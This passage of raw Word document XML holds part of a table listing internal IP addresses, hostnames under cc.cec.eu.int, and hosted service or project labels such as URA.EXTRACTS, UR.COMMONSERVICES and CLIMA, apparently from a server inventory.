            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1496" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52A82A61" w14:textId="3366C2BC" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="5098119F" w14:textId="186EAD66" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="35FDFA4B" w14:textId="1451FAE4" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.214</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53E7D586" w14:textId="72CB51EF" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04187.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3048515F" w14:textId="7D1324FF" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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735F874A" w14:textId="627F4F7C" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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68FED395" w14:textId="491923D5" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>URA.EXTRACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="3C316CBD" w14:textId="1307D772" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6F6FC29B" w14:textId="038B45E0" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.140.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25A98583" w14:textId="6CD76F74" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04188.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="325461B1" w14:textId="1FDBA5E9" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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585740CF" w14:textId="48789D5B" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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2EE0DB80" w14:textId="5639915C" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>URA.EXTRACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="6777597D" w14:textId="035181FD" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="142176E5" w14:textId="194435B3" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.130.139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66AE649F" w14:textId="12287BE2" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02910.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7CB17FF3" w14:textId="362556E8" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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062C998A" w14:textId="5183D8E6" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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68F47B22" w14:textId="4A24C87F" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="21C8A4E6" w14:textId="0624B85A" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="04671294" w14:textId="3143B1D1" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.130.41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ADA3416" w14:textId="3D1AA384" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02925.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="036A6AD2" w14:textId="41FFDD4A" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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563680C4" w14:textId="0FD92DA9" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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49C0F583" w14:textId="19B974B4" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="4154636C" w14:textId="0A9791DD" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1F9B587B" w14:textId="5CA1322F" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.179.234</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04510C7B" w14:textId="72C9D580" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04205.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5A78CBA1" w14:textId="441086DC" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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2EC902C5" w14:textId="49128D66" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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73C374A5" w14:textId="67C755F9" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="7BA102EB" w14:textId="2C5EC1F9" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="41946392" w14:textId="70DD9A7F" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.133.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37761FA8" w14:textId="54FBB498" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04185.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="207FFB82" w14:textId="574C0C2D" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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5F35F282" w14:textId="1B7C014D" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF"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4A4433D0" w14:textId="7F4AB079" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A550F8" w:rsidRPr="001019D3" w14:paraId="0740D15F" w14:textId="3584A1E8" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0680C09F" w14:textId="220BF9E1" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.181.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F6260D9" w14:textId="39AA7D29" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03815.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05DE8CE1" w14:textId="5C90596C" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="818" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A9005DF" w14:textId="28C361AC" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1496" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3C4417F9" w14:textId="6A86CA5D" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="2D36CB5D" w14:textId="1B588B5E" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4CE83912" w14:textId="4245EE63" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.130.222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71AEC4A9" w14:textId="4C2E1D5E" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>tmstd00513.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3E729D8E" w14:textId="20298E1F" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8"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189E9B65" w14:textId="753DEF1C" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8"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2EE75BCF" w14:textId="640AF9AF" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>MRV4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A550F8" w:rsidRPr="001019D3" w14:paraId="00F999C5" w14:textId="7CB9D2B0" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1D1213F6" w14:textId="29831C1D" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.143.108</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56C551DB" w14:textId="42557DB9" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03381.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4F44154C" w14:textId="64C503FD" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8"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2C5D0115" w14:textId="7536DC52" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8"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7FD49681" w14:textId="54AF26B4" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
